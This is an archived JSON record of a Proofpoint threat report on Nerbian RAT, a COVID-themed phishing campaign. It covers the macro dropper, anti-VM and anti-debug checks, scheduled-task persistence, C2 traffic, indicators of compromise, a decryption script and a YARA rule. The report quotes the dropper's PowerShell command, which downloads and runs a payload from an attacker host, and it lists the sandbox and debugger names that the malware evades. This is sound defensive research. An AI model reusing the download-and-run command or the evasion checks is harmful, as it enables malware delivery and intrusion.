{
	"id": "9b8431dc-3361-473e-ac66-b57149ad5cc8",
	"created_at": "2026-04-06T00:10:42.050133Z",
	"updated_at": "2026-04-10T03:22:02.885272Z",
	"deleted_at": null,
	"sha1_hash": "9a976383c33428e1bb1df751af98e7f5b4e90ab8",
	"title": "Nerbian RAT Using COVID-19 Themes Features Sophisticated Evasion Techniques | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2020039,
	"plain_text": "Nerbian RAT Using COVID-19 Themes Features Sophisticated Evasion\r\nTechniques | Proofpoint US\r\nBy May 11, 2022 Andrew Northern, Pim Trouerbach, Tony Robinson, Axel F\r\nPublished: 2022-05-10 · Archived: 2026-04-05 16:40:37 UTC\r\nKey Findings\r\nProofpoint has analyzed a novel malware variant which utilizes significant anti-analysis and anti-reversing\r\ncapabilities.\r\nThe malware, written in the Go programming language, uses multiple open-source Go libraries for conducting\r\nmalicious activities.\r\nThe malware, called Nerbian remote access trojan (RAT) leverages COVID-19 and World Health Organization\r\nthemes to spread.\r\nProofpoint researchers named the malware based on a named function in the malware code. Nerbia is a fictional\r\nplace from the novel Don Quixote. \r\nOverview\r\nThe newly identified Nerbian RAT leverages multiple anti-analysis components spread across several stages, including\r\nmultiple open-source libraries. It is written in operating system (OS) agnostic Go programming language, compiled for 64-\r\nbit systems, and leverages several encryption routines to further evade network analysis. Go is an increasingly popular\r\nlanguage used by threat actors, likely due to its lower barrier to entry and ease of use. \r\nCampaign Details\r\nStarting on April 26, 2022, Proofpoint researchers observed a low volume (less than 100 messages) email-borne malware\r\ncampaign sent to multiple industries. The threat disproportionately impacts entities in Italy, Spain, and the United Kingdom.\r\nThe emails claimed to be representing the World Health Organization (WHO) with important information regarding\r\nCOVID-19. The malware sample was also noted by security researcher pr0xylife on Twitter. Proofpoint researchers\r\nobserved the following indicators and attachments:\r\nFrom: who.inter.svc@gmail[.]com, announce@who-international[.]com\r\nSubjects: WHO, World Health Organization\r\nAttachment Names and Types: who_covid19.rar with who_covid19.doc inside, covid19guide.rar with covid19guide.doc\r\ninside, covid-19.doc\r\nThe messages that purport to be from WHO and include safety measures relating to COVID-19 include an attached Word\r\ndocument containing macros.\r\nFigure 1: Example email that purports to be from WHO.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 1 of 12\n\nFigure 2: Attached Word document.\r\nThe emails contain a macro-laden Word attachment (sometimes compressed with RAR). When macros are enabled, the\r\ndocument reveals information relating to COVID-19 safety, specifically about self-isolation and caring for individuals with\r\nCOVID-19. Interestingly, the lure is similar to themes used in the early days of the pandemic in 2020, specifically spoofing\r\nthe WHO to distribute information about the virus. \r\nFigure 3: Screenshot of the document lure containing COVID-19 guidance, specifically what users see when they enable\r\nmacros on the malicious document.\r\nIn addition to masquerading as the WHO, the document also appears to contain logos from the Health Service Executive\r\n(HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI).\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 2 of 12\n\nFigure 4: Document with additional logos related to government and non-profit entities.\r\nAttack Path\r\nWhen users enable macros on this document, the document executes an embedded macro that drops a .bat file with the\r\nfollowing contents:\r\npowershell  IWR -Uri  hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog  -OutFile C:\\Users\\\r\n[username]\\AppData\\Roaming\\UpdateUAV.exe ;C:\\Users\\[username]\\AppData\\Roaming\\UpdateUAV.exe\r\nThis batch file performs a PowerShell Invoke Web Request (IWR) to the URL:\r\nhxxps://www[.]fernandestechnical[.]com/pub/media/gitlog,\r\nIt renames the downloaded file to UpdateUAV.exe, and drops it into:\r\nC:\\Users\\[current user]\\AppData\\Roaming\\UpdateUAV.exe.\r\nDropper: UpdateUAV.exe\r\nUpdateUAV.exe is the payload initially downloaded from the malicious Word document. It is a 64-bit executable, written in\r\nGolang, 3.5MB in size, and UPX packed. Executable files created in the Go language tend to be slightly larger than most\r\nother executable files. Likely, this malware is packed with UPX to reduce the overall size of the executable being\r\ndownloaded. Unpacked, the file is 6.6MB in total.\r\nFigure 5: The UpdateUAV.exe payload is packed with UPX, likely in an effort to reduce its size.\r\nProofpoint analysts extracted decrypted data during execution. The resulting memory revealed additional information about\r\nthe sample.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 3 of 12\n\nFunctionality\r\nUpdateUAV.exe is a dropper for Nerbian RAT. This determination was made through multiple different observations. First is\r\nthe string embedded in the sample:\r\n         K:/W_Work/Golang/src/RAT_Dropper/main_gen.go\r\nAccording to the source path, this executable is a dropper. Proofpoint named this malware “Nerbian RAT” based on one of\r\nthe function names in the dropper. The specific function name is “main_downloadNerbian” as shown in the following figure.\r\nFigure 6 : Nerbian RAT main function code.\r\nThere are additional references to \"Nerbian\" in some of the Go functions scattered throughout the binary.\r\nFigure 7: Functions referring to the RAT the dropper is meant to download and store on the compromised system.\r\nCode Reuse\r\nMost software developers, including malware developers, use existing software packages. The UpdateUAV executable,\r\nwhich is a dropper for Nerbian RAT, features a lot of code re-use, with strings referencing various GitHub projects:\r\ngithub.com/go-ole/go-ole – Go bindings for Windows COM (Component Object Model – inter-process communication)\r\ngithub.com/gonutz/w32/v2 – Go bindings for the Win32 API\r\ngithub.com/mitchellh/go-ps – Library implements OS-specific APIs to list and manipulate processes\r\ngithub.com/StackExchange/wmi – Go package for Windows WMI, providing a WQL interface\r\nOut of all these references to external projects the most interesting is:\r\ngithub.com/p3tr0v/chacal/\r\nAnti-Debug, Anti-VM, Anti-Forensics\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 4 of 12\n\nFigure 8: Chacal GitHub page.\r\nChacal is described as, “Golang anti-vm framework for Red Team and Pentesters”. However, there are several functions and\r\nreferences in the project designed to make debugging and reverse engineering more difficult as well.\r\nThe dropper will stop execution if it encounters any of the following conditions:\r\nThe size of the hard disk on the system is less than a certain size. The default defined in Chacal is 100GB.\r\nThe name of the hard disk, according to WMI contains one of the following strings:\r\n\"virtual\"\r\n\"vbox\"\r\n\"vmware\"\r\nThe MAC address queried returns any of the following OUI values:\r\n00:0c:29, 00:50:56, 08:00:27, 52:54:00, 00:21:F6, 00:14:4F, 00:0F:4B, 00:10:E0, 00:00:7D, 00:21:28,\r\n00:01:5D, 00:21:F6, 00:A0:A4, 00:07:82, 00:03:BA, 08:00:20, 2C:C2:60, 00:10:4F, 00:0F:4B, 00:13:97,\r\n00:20:F2, 00:14:4F\r\nAny of the following reverse engineering/debugging programs are encountered in the process list:\r\nprocesshacker.exe, procmon.exe, pestudio.exe, procmon64.exe, x32dbg.exe, x64dbg.exe, CFF Explorer.exe,\r\nprocexp64.exe, procexp.exe, pslist.exe, tcpview.exe, tcpvcon.exe, dbgview.exe, RAMMap.exe,\r\nRAMMap64.exe, vmmap.exe, ollydbg.exe, agent.py, autoruns.exe, autorunsc.exe, filemon.exe, regmon.exe,\r\nidaq.exe, idaq64.exe, ImmunityDebugger.exe, Wireshark.exe, dumpcap.exe, HookExplorer.exe,\r\nImportREC.exe, PETools.exe, LordPE.exe, SysInspector.exe, proc_analyzer.exe, sysAnalyzer.exe,\r\nsniff_hit.exe, windbg.exe, joeboxcontrol.exe, joeboxserver.exe, joeboxserver.exe, ResourceHacker.exe,\r\nFiddler.exe, httpdebugger.exe\r\nAny of the following memory analysis/memory tampering programs are present in the process list:\r\nDumpIt.exe, RAMMap.exe, RAMMap64.exe, vmmap.exe\r\nA time measurement function checks to see if the amount of time elapsed execution specific functions is deemed\r\n\"excessive\". If the time threshold is reached, the malware assumes it is being debugged, and will exit.\r\nIn addition to the anti-reversing checks provided by Chacal, there are other anti-analysis checks present in the binary\r\nincluding:\r\nUses the IsDebuggerPresent API to determine if the executable is being debugged\r\nAppears to query for the following network interface names:\r\nIntel® PRO/1000 MT Network Connection\r\nLoopback Pseudo-Interface 1\r\nSoftware Loopback Interface 1\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 5 of 12\n\nDownload, Execution, and Persistence\r\nIn the case of analyzed sample, the dropper attempted to download its payload from:\r\nhxxps://www[.] fernandestechnical [.]com/pub/media/ssl\r\nAnd will save the RAT to:\r\nC:\\ProgramData\\USOShared\\MoUsoCore.exe\r\nNext, the dropper will attempt to establish a scheduled task named MicrosoftMouseCoreWork to start the RAT payload\r\nhourly to establish persistence.\r\nThe dropper's end-goal is to download the executable named SSL, save it as MoUsoCore.exe, and configure a scheduled\r\ntask to run it hourly as its primary persistence mechanism.\r\nPayload - MoUsoCore.exe\r\nMoUsoCore.exe is the name of the payload that the dropper binary, UpdateUAV.exe, attempts to download and establish\r\npersistence for. Like the dropper itself, it is written in Go, and is UPX packed. The size of the binary in its packed state is\r\n5.6MB, while in its unpacked state is 9.2MB.\r\nFunctionality and Configuration Settings\r\nNerbian RAT seems to support a variety of different functions, most of which are dictated by encrypted configuration\r\nsettings in the binary itself. Proofpoint identified various configuration settings this sample utilizes:\r\n\"185.121.139[.]249\"\r\nhttps://www[.]fernandestechnical[.]com/pub/health_check.php\r\n8ffe450597cbbfa5a703e23a8b6bbdaeda76badf2b035e75de5ffdb3af07270d\r\n\"100\"\r\n\\\\\\\\ProgramData\\\\\\\\Microsoft OneDrive\\\\\\\\setup\r\n\"rev.sav\"\r\n===Configuration===\r\ndefault_communication_protocol: %s\r\ndefault_conn_interval: %d\r\nb_use_alive_signal: %t\r\nstart_worktime: %d\r\nend_worktime: %d\r\nalive_interval: %d\r\nb_use_secondary_host: %t\r\nb_use_sleep_filetransfer: %t\r\ntime_sleep_filetransfer: %d\r\nretry_count_filetransfer: %d\r\nconnection_error_sleep_time: %d\r\nbpreflaged_use_backupserver: %t\r\nflagged_time_backupserver: %s\r\nswitch_backupserver_time: %d\r\nprimary_host: %s\r\nsecondary_host: %s\r\nprimary_http_proxyserver: %s\r\nsecondary_http_proxyserver: %s\r\nworking_directory: %s\r\nb_run_cmd_result_outfile: %t\r\nidle_state_limit_time: %d\r\nst:%d\r\nnt: %d\r\nMany of these strings pertain to setting operating parameters for the malware such as what hosts it communicates with, how\r\noften it checks in to the C2 domains and IP addresses with keep-alive messages, the malware’s preferred working directory,\r\nand the hours in which it operates, in addition to other parameters.\r\nIt's likely that 185[.]121[.]139[.]249 and hxxps://www[.]fernandestechnical[.]com/pub/health_check.php are the designated\r\nC2 backup domains and URI for keep-alives and check-ins.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 6 of 12\n\nKeylogging\r\nThe RAT appears to have the ability to log keystrokes and appears to write them, encrypted, to the rev.sav file mentioned in\r\nthe configuration settings above.\r\nScreen Capture\r\nNot unlike the dropper, the RAT utilizes a lot of pre-existing Go code to perform many of its functions:\r\ngithub.com/lxn/win\r\ngithub.com/go-ole/go-ole\r\ngithub.com/StackExchange/wmi\r\ngithub.com/digitalocean/go-smbios/smbios\r\ngithub.com/AllenDang/w32.init\r\nAgain, out of all of these, one of the more interesting external references is to the following GitHub repo:\r\n           github.com/kbinani/screenshot/ \r\nThis repo is a Go library for performing screen captures on a variety of different operating systems.\r\nC2 Communications\r\nAs with most modern malware families, this RAT prefers to handle its communications over SSL. Proofpoint observed two\r\ntypes of network traffic. The first is a simple Heartbeat/Keep-Alive to the C2 domains/IP addresses.\r\nFigure 9: The Heartbeat/Keep-alive traffic to the C2 domain/IP addresses. Please disregard the extra \"p\" at the end of\r\n/pub/health_check.php.\r\nAdditional communication observed was a POST request to the configured C2 domains and IP addresses with a large\r\ncollection of HTTP form data being uploaded in the request:\r\nFigure 10: Notice the different names in the Content-Disposition field for each form in this POST request. All of this data is\r\nboth base64 encoded and encrypted, regardless of whether the C2 communication is happening over HTTP or HTTPS.\r\nForm-data names being posted to the C2 server include:\r\naddr_post – IP address posting to\r\nport_post – network port posting to\r\nauth_post – likely a per-session encryption key or password used after initializing the C2 communication\r\nsession_key – the only field that isn't encrypted. This is a combination of a string that serves as a sort of campaign identifier,\r\na hash of values retrieved via the SMBIOS Golang module, and the operating system designation of the system talking to\r\nthe C2 server (in this case \"windows\"). \r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 7 of 12\n\ndata_post – exfiltrated data from the victim host\r\nAll of the fields above, with exception of session_key form data field, utilize a unique encryption scheme. The first 70 bytes\r\nof the POST are \"garbage\", while the next 24 bytes contain an AES key that can be used to decrypt the remaining data.\r\nProofpoint researchers developed a Python script that will enable decrypting this posted data:\r\nimport malduck\r\nimport binascii\r\ndata =\r\n\"BgxxweBaPoZVPcfLoQFSHMfqqeitJaZjoSKOBrhsCxtDMYGxPUHsKYcXetaTSJaSULtqZQAwoDiTrCtDpVKvaLxjZPSLcLBvlyREEguzuO0Z8119x\r\ndef decrypt_post_param(base64_encoded_content):\r\n    junk = base64_encoded_content[:70]\r\n    key = base64_encoded_content[70:70+32]\r\n    print(\"[+] key: %s\" % key)\r\n    crypted_data = base64_encoded_content[70+32:].encode(\"utf-8\")\r\n    base64_decoded = malduck.base64.decode(crypted_data)\r\n    iv = key[:16].encode(\"utf-8\")\r\n    full_data = base64_decoded\r\n    print(\"[+] crypted data [%d]: %s\" % (len(full_data), binascii.hexlify(full_data)))\r\n    return malduck.aes.cbc.decrypt(key.encode(\"utf-8\"), iv, full_data)\r\n \r\nprint(decrypt_post_param(data))\r\nFigure 11: Python script for decrypting posted data. \r\nUsing the code above, users can decrypt the data being posted. In this instance, Proofpoint chose to decrypt the base64\r\nencoded data from the addr_post field from an internal sandbox run. Users will need to replace the data variable with the\r\nbase64 encoded block they wish to decrypt, or otherwise modify the script to accept input.\r\nAs mentioned above however, the session_key field is not encrypted, it is base64 encoded. What does this field contain?\r\nFigure 12: The value of the session_key field is just a concated string, containing three values that are base64 encoded.\r\nWhen submitted to Cyberchef using the From Base64 recipe, the base64 encoded string:\r\nOGZmZTQ1MDU5N2NiYmZhNWE3MDNlMjNhOGI2YmJkYWVkYTc2YmFkZjJiMDM1ZTc1ZGU1ZmZkYjNhZjA3MjcwZDoyNWI0ZWJjYTRiYm\r\nDecodes to:\r\n8ffe450597cbbfa5a703e23a8b6bbdaeda76badf2b035e75de5ffdb3af07270d:25b4ebca4bbc82ab5ae2e517c29d33e7:windows\r\nThis string contains three values, concatenated and delimited with the \":\" character. Proofpoint assesses the first value,\r\n8ffe450597cbbfa5a703e23a8b6bbdaeda76badf2b035e75de5ffdb3af07270d is some sort of an implant or campaign\r\nidentifier, while 25b4ebca4bbc82ab5ae2e517c29d33e7 is a value derived from host identifier data collected using the go-smbios library mentioned above, while the final value is the operating system of the compromised host (windows)\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 8 of 12\n\nFigure 13: The process flow of Nerbian RAT\r\nAssessment\r\nThis is a complex piece of malware, consisting of three stages:\r\nMaldoc phishing lure\r\nDropper that performs a large variety of environment checking – anti-reversing and anti-VM checks\r\nNerbian RAT – encrypted configuration file, extreme care to ensure data is encrypted to the C2\r\nDespite all this complexity and care being taken to protect the data in transit and \"vet\" the compromised host, the dropper\r\nand the RAT itself do not employ heavy obfuscation outside of the sample being packed with UPX, which it can be argued\r\nisn't necessarily for obfuscation, but to simply reduce the size of the executable.\r\nAdditionally, much of the functionality of both the RAT and the dropper are easy to infer due to the strings referring to\r\nGitHub repositories – specifically the Chacal and screenshot repositories exposes partial functionality of both the dropper\r\nand the RAT.\r\nWhy Nerbian RAT?\r\nAt first it was hard to find any references to \"Nerbian\" on the internet, until Proofpoint analysts came across this passage in\r\nDon Quixote:\r\n“But turn thine eyes to the other side, and thou shalt see in front and\r\n in the van of this other army the ever victorious and never vanquished\r\n Timonel of Carcajona, prince of New Biscay, who comes in armour with\r\n arms quartered azure, vert, white, and yellow, and bears on his shield\r\n a cat or on a field tawny with a motto which says Miau, which is the\r\n beginning of the name of his lady, who according to report is the\r\n peerless Miaulina, daughter of the duke Alfeniquen of the Algarve; the\r\n other, who burdens and presses the loins of that powerful charger\r\n and bears arms white as snow and a shield blank and without any\r\n device, is a novice knight, a Frenchman by birth, Pierres Papin by\r\n name, lord of the baronies of Utrique; that other, who with\r\n iron-shod heels strikes the flanks of that nimble parti-coloured\r\n zebra, and for arms bears azure vair, is the mighty duke of Nerbia,\r\n Espartafilardo del Bosque, who bears for device on his shield an\r\n asparagus plant with a motto in Castilian that says, Rastrea mi\r\n suerte.\"\r\nNerbia is a fictional place from the great novel Don Quixote. The knight from Nerbia had a shield with a crest of asparagus\r\nand a banner reading \"Try your luck\".\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 9 of 12\n\nFigure 14: Nerbia is a fictional land from the novel Don Quixote. The Knight of Nerbia wore a shield with an asparagus\r\ncrest with a Castilian Spanish motto that reads \"Rastrea Mi Suerte.\" Which roughly translates to \"Try your luck.\" In English.\r\nPlease note that this crest is not associated with the novel and was created because Threat Research at Proofpoint likes to\r\nhave fun.\r\nMany of the strings referencing Nerbia were located in the companion dropper (UpdateUAV.exe). There are no references to\r\nNerbia in the RAT payload itself (MoUsoCore.exe). Proofpoint assesses with high confidence that the dropper and RAT\r\nwere both created by the same entity, and while the dropper may be modified to deliver different payloads in the future, the\r\ndropper is statically configured to download and establish persistence for this specific payload at the time of analysis.\r\nIndicators of Compromise\r\nFilename  covid-19.doc \r\nMD5 Hash  d7888fea6047b662a30bf00edac4c3ee \r\nSHA1 Hash  8137670512be55796f612e41602f505955b0bb0c \r\nSHA256 Hash  ee1bbd856bf72a79221baa0f7e97aafb6051129905d62d74a37ae7754fccc3db \r\nFilename  UpdateUAV.exe \r\nMD5\r\nHash \r\n9cca59eec5af63e42cd845b67cf6df89 \r\nSHA1\r\nHash \r\n178aad6c7918cc495a908944e79143a913630890 \r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 10 of 12\n\nSHA256\r\nHash \r\n1b8c9e7c150bacd466fbe7f12b39883821f23b67cae0a427a57dc37e5ea4390f \r\nNotes \r\nDownloaded from hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog via Powershell Invoke Web\r\nRequest (IWR) to C:\\Users\\[current_user]\\Appdata\\Roaming\\UpdateUAV.exe \r\n64-bit golang executable, UPX packed \r\nFilename  MoUsoCore.exe \r\nMD5\r\nHash \r\n5d5bc970f975341558b8d2c225ca0115 \r\nSHA1\r\nHash \r\n4f74826ed56cda233cfc12b86fd1b7da4a9f2e56 \r\nSHA256\r\nHash \r\n902c65435b6b44cfda1156b0e7c6a30b2785fa4f2cbb9b1944a66f5146ec7aa5 \r\nNotes \r\nDownloaded from hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog via Powershell Invoke Web\r\nRequest (IWR) to C:\\Users\\[current_user]\\Appdata\\Roaming\\UpdateUAV.exe \r\n64-bit golang executable, UPX packed \r\nDomain  www[.]fernandestechnical[.]com \r\nNotes  hxxps://www[.]fernandestechnical[.]com/pub/health_check.php \r\nIP Address  185[.]121[.]139[.]249 \r\nNotes  Additional IP address identified in the Nerbian RAT (MoUsoCore.exe) configuration. \r\nDetection\r\nNetwork\r\nSnort and Suricata rules are available in the ETOPEN ruleset under SIDs:\r\n2036426 - ET MALWARE Nerbian RAT CnC Checkin\r\n2036427 - ET MALWARE Nerbian RAT Data Exfiltration\r\nStatic\r\nThe Yara rule below should provide host-based static detection of the RAT payload:\r\nrule Nerbian_RAT\r\n{\r\n    meta:\r\n        author = \"ptrouerbach\"\r\n        reference = \"5e6c5a9fda2d20125f6f24e37e8a217a39ff0a5cfddc07ddfdb18049d9ea4597\"\r\n        malfamily = \"NerbianRAT\"\r\n    strings:\r\n        $args_p = \"p-\" ascii\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 11 of 12\n\n$args_s = \"s-\" ascii\r\n        $args_h = \"h-\" ascii\r\n        $args_P = \"P-\" ascii\r\n        $hardcoded_aes_key = { 17E87F581F1DF8D6129D65FD50CEB3DD6C4E1C223077CD7D4C595DA6C3DF92B2 }\r\n $param_auth = \"auth_post\" ascii\r\n        $param_session = \"session_key\" ascii\r\n        $param_data = \"data_post\" ascii\r\n        $param_addr = \"addr_post\" ascii\r\n        $param_port = \"port_post\" ascii\r\n    condition:\r\n        uint16be(0) == 0x4D5A\r\n        and ($hardcoded_aes_key or (all of ($param*) and all of ($args*)))\r\n        and filesize \u003c 10MB\r\n}\r\nAdditional Acknowledgements\r\nProofpoint security researchers would like to thank security researcher pr0xylife sharing his observations of this threat on\r\nsocial media.\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques"
	],
	"report_names": [
		"nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques"
	],
	"threat_actors": [],
	"ts_created_at": 1775434242,
	"ts_updated_at": 1775791322,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a976383c33428e1bb1df751af98e7f5b4e90ab8.pdf",
		"text": "https://archive.orkl.eu/9a976383c33428e1bb1df751af98e7f5b4e90ab8.txt",
		"img": "https://archive.orkl.eu/9a976383c33428e1bb1df751af98e7f5b4e90ab8.jpg"
	}
}